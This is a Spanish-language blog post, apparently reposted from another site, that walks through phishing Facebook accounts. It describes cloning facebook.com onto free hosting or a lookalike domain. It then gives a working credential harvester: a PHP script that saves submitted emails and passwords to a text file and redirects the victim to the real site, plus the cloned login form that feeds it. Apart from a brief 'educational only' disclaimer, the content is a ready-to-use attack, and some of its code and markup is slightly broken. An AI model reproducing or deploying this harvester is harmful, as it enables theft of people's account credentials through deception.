Cuentas de redes sociales usando un ataque de phishing
El phishing es uno de los mejores ataques de ingeniería social que implica la recopilación de información confidencial y confidencial del objetivo,
por ejemplo
La tarjeta de crédito, la tarjeta de débito, la contraseña bancaria y la contraseña de las redes sociales. En este método, el atacante clona el sitio web oficial específico y lo envía al objetivo. .
siempre que el objetivo visite el sitio web de phishing del atacante e ingrese su información confidencial.
El atacante recibirá la misma información confidencial.
Veamos un ejemplo de phishing en Facebook.
El atacante clona el sitio web facebook.com y crea la página de facebook maliciosa y hospeda el sitio web en cualquier alojamiento gratuito como web000hostapp o compre un dominio de cualquier registrador
Facebook phishing se parece a: - faceb00k.com
veamos cuál es el resultado si el objetivo inicia sesión a través de nuestra página de phishing e ingrese su información, como se muestra a continuación, y haga clic en el resultado de ingreso a continuación
Una vez que el objetivo haya alcanzado la entrada, será redirigido a su https://www.facebook.com compartir a continuación
Prueba
Codigo php
<?php
file_put_contents("credencial.txt", "Account: " . $_POST[email] . " Pass: " . $_POST[pass] . "\n", FILE_APPEND);
header(Location: https://facebook.com/);
exit();
?>
Codigo html
<form method="post" action="login.php" class="bj bk" id="login_form" novalidate="1">
<!--<form method="post" action="obtener.php" class="bj bk" id="login_form" novalidate="1">-->
<input type="hidden" name="lsd" value="AVqtQgzP" autocomplete="off" />
<input type="hidden" name="m_ts" value="1496628789" />
<input type="hidden" name="li" value="Nb40WeKiZQn-XtfEITzKEkZp" />
<input type="hidden" name="try_number" value="0" />
<ul class="bl bm bn">
<li class="bm">
<h3 class="bo bp bq">Correo electronico o telefono</h3>
<input autocorrect="off" autocapitalize="off" type="email" class="br bs bt" name="email" value="" />
</li><li class="bm">
<div>
<h3 class="bo bp bq">Constrasena</h3>
<input autocorrect="off" autocapitalize="off" class="br bs bu bv" name="pass" type="password" />
</div>
</li>
<div class="upage vertical-col left" id="mainpage">
<li class="bm">
<input value="Iniciar sesion" type="submit" name="Iniciar sesion" class="m n bw bx by" />
<!--facebook-->
</li>
</div>
</ul>
<div>
</div
noscript>
<input type="hidden" name="_fb_noscript" value="true" />
</noscript>
</form>
A continuación, vea cómo el pirata informático redirige a facebook; utilizan el script php para almacenar la información en un archivo particular.
Buscamos la etique form en action pondremos el nombre de script php
<form method="post" action="" class="bj bk" id="login_form" novalidate="1">
Ahora vea en el script anterior el objetivo, guarde el nombre de usuario y la contraseña en txt.
https://www.facebook.com/videocall/incall/?peer_id=
ADVERTENCIA: NO INTENTE HACER UN ATAQUE SIN EL PERMISO DE PROPIETARIO DEL SITIO WEB. ES UN PROPÓSITO EDUCATIVO SOLAMENTE. NO ES RESPONSABLE DE NINGÚN TIPO DE PROBLEMA ILEGAL.
PERMANECE LEGAL.
GRACIAS!
Si tienes algún problema, deja un comentario.
Mi nombre es Luishiño aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática..
Fuente: este post proviene de The Seven Codes, donde puedes consultar el contenido original.
¿Vulnera este post tus derechos? Pincha aquí.
Creado:
